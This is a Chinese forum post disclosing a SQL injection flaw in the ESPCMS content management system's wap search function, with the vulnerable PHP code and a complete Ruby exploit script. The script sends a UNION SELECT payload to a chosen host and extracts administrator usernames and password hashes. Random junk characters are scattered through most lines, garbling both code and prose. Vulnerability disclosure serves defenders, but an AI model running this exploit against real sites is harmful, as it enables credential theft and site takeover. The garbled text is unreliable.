0×0 漏洞概述0×1 漏洞细节, S, m7 \, \) t- o# k% P
0×2 PoC' L8 f2 s; a2 f7 c, R* s
8 h, Y6 d g: z
2 N. p& F; E/ F( B$ |) y2 K3 O; Y# n$ I5 k8 C, Y& }# B3 r
0×0 漏洞概述 P Z- _( H# @, A; _3 L
1 @% L2 s9 E/ @6 A" n( @2 c5 _易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。
4 a; x9 o7 Q: g" l y其在处理传入的参数时考虑不严谨导致SQL注入发生; @/ D+ a( a) ^7 f& ]6 y4 b& ?
6 J; x0 J7 {7 \ ]
# f& S( f$ }9 P' r
0×1 漏洞细节
; K% w. ?# h( ?! T) X6 B7 M! c, k" k
变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
/ t6 J2 R% W# s! ^8 ^! q$ ?正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。' F) R& r) r% @/ M0 M
而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。9 b1 ^8 h' J/ M- G: D4 d1 G1 z
' _" e1 O% p4 W4 P- Q
在/interface/3gwap_search.php文件的in_result函数中:$ H% V2 }" \/ D. }
' l! ~/ \% \' R+ v: d9 g
" y$ |/ P8 o7 \* `
- G3 Y x# U& v- X, W function in_result() {$ E6 N4 _1 G) s4 k4 p, @% K
... ... ... ... ... ... ... ... ...
( {( O" h6 [- x3 _7 K H5 L& x $urlcode = $_SERVER[ 'QUERY_STRING '];
. W- Q" ^4 Q% F$ D- X parse_str(html_entity_decode($urlcode), $output);
/ O- B5 m% Y6 ?2 {+ l, W% y U5 R( `) I( i1 z# i- `; I) }! E4 L
... ... ... ... ... ... ... ... ...
$ H0 B# n1 n ~, X& S3 y if (is_array($output['attr' ]) && count($output['attr']) > 0) {
4 V- \/ d; P5 M& H+ K7 _7 E2 o7 E; y3 k
$db_table = db_prefix . 'model_att';
6 t1 S" N0 S8 C- M1 E! u" x
+ t. T+ k) T! `0 ^' b4 u foreach ($output['attr' ] as $key => $value) {
+ j+ v! Y B% q4 M* B if ($value) {
) U* C3 r& S3 C) u- A1 g
& p+ I' Y4 q8 p' f/ N+ t $key = addslashes($key);/ D# q' ?( e) c( v1 K2 f& C
$key = $this-> fun->inputcodetrim($key);
* L) w+ I" A% _& U- l( }8 r $db_att_where = " WHERE isclass=1 AND attrname='$key'";
" x: N3 j& h* _ S M $countnum = $this->db_numrows($db_table, $db_att_where);- H$ I) o# G, S* h, L( x; W
if ($countnum > 0) {
+ f1 z% y9 }' N/ J+ O% l $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;4 F5 |, [* m" N8 n0 U# g
}
* V" T0 U2 t& F }
, Y; }& N- y3 P7 h) X }
. r( L+ K/ {0 } R1 T: ] }( ?" x$ m: g0 \& \. U1 q
if (!empty ($keyword) && empty($keyname)) {/ s8 x3 B4 e1 U! N3 C6 C
$keyname = 'title';+ Q. Z* }% P# i0 j1 f+ T
$db_where.= " AND a.title like '%$keyword%'" ;0 J% H( d# ?3 J2 r) W; s; E
} elseif (!empty ($keyword) && !empty($keyname)) {
& ]7 w- P h$ Q6 r+ i $db_where.= " AND $keyname like '% $keyword%'";
3 `$ A. _9 v) W7 n- V }. L& k m. D4 X* i# t& ?& ]3 p5 |
$pagemax = 15;7 e3 Y% Y5 |6 A2 ]; `. A) h
. @& a( q1 a1 k! D
$pagesylte = 1;5 h1 m' W- U$ R. g
& d6 d N* n$ d2 o7 N
if ($countnum > 0) {
: E' q$ f+ k7 ?, O. r
! F! [9 ?: q4 s, d$ \ $numpage = ceil($countnum / $pagemax);
! O2 ]0 l }8 K5 s6 y } else {
. r0 ^# j1 {2 L( F! p $numpage = 1;
/ S0 @* d }% g+ M }- q$ _! x% H5 ?+ @ ~* a, s
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
, D- u. a/ M) Y* r1 J! X $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);' E9 [8 \$ ?, I. x# t, Z( D) @
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
! b) b1 T& G& a1 j ... ... ... ... ... ... ... ... .../ z% M# d6 n: _$ O% ]
}8 D4 Q6 x* k2 ?: N
' ~! F0 B/ K! n
6 P: C' J8 `4 l b% {% [6 n0×2 PoC# T i) {) O) l- z* _ Y
9 Q3 D' M" l) U5 Q6 ~
, ]* H9 m; s% y' d; ?* O
9 P; @) ]/ E' _6 a' M9 z9 r6 Jrequire "net/http", a6 j4 L* m+ G3 P. M
& p/ y6 Q. H6 J* U* ]% L& d' F) kdef request(method, url)/ L, g4 f) ]' i$ ?+ V
if method.eql?("get")
. X7 J+ [8 T/ N* w. `" W! e( V# W uri = URI.parse(url)
% K2 i% L& j: P! c. G- A http = Net::HTTP.new(uri.host, uri.port)
8 e/ _) R1 o6 H; P' s response = http.request(Net::HTTP::Get.new(uri.request_uri))& T: }/ _6 S( P2 i9 e4 r9 n' o
return response
6 j, o2 _- e/ y% R: H+ y% z9 ` end
6 `% `* c1 U2 q/ h* tend# L. }- n$ s9 [" J
1 R# w( u+ F- ~* N& J' c7 `+ idoc =<<HERE' S5 ]! T: D/ G" O
-------------------------------------------------------! N. W; Z0 A! B7 _
Espcms Injection Exploit
9 B G, @. H# B# G4 I4 TAuthor:ztz$ F5 _) Y7 n7 {& F) {; k; t
Blog:http://ztz.fuzzexp.org/1 Q( M5 p) ~* O( f; m" n$ {* E
-------------------------------------------------------
* e7 D( f) E( w3 t- g" A$ j5 J: G9 W2 }; e
HERE/ j' S6 E ^; R+ v9 X
8 U, o8 o8 ~% d+ g; j9 qusage =<<HERE( U5 E7 T- {; N6 Y7 k
Usage: ruby #{$0} host port path( {1 ?# Q' W B
example: ruby #{$0} www.target.com 80 /0 K: T. g- v) m! X+ h% u) @+ R- p
HERE
( ? {0 P* H( |
- r8 R. T$ M1 P6 r0 @puts doc
5 H; N) z' O8 S/ yif ARGV.length < 3
2 q9 O& |. U8 e$ D V puts usage
( ^$ _4 n+ z& I L, f8 gelse _+ D8 R; i2 w! ]# I8 R
$host = ARGV[0]
3 K; M4 w, x; S5 [- M' V $port = ARGV[1]9 b T1 ^5 Z1 ?- m
$path = ARGV[2]
/ l( m' [, {8 q; v6 `. h6 w/ N: A; ^7 w: p
puts "send request..."
( \9 u+ n. k) f0 i1 y. F. a9 F [; U url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
% a3 C; c1 @1 c1 [6 [6 } ^/ n9 J! kattr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13% n. D# n2 J4 L& W( k
,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
7 J, v3 C7 a7 i7 @,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
3 S% t6 H' f1 m0 K response = request("get", url)6 w# S! H5 M' K( a2 |6 w6 j7 @
result = response.body.scan(/\w+&\w{32}/)
& K& e G8 P4 v7 G puts result0 H, E" E6 S" j$ Q5 V/ r5 @
end
9 [2 ^& U: s- R/ J+ b7 \' T
+ Z7 k! S L! x5 H |
发表于 2013-7-27 18:31:52
收藏
支持
反对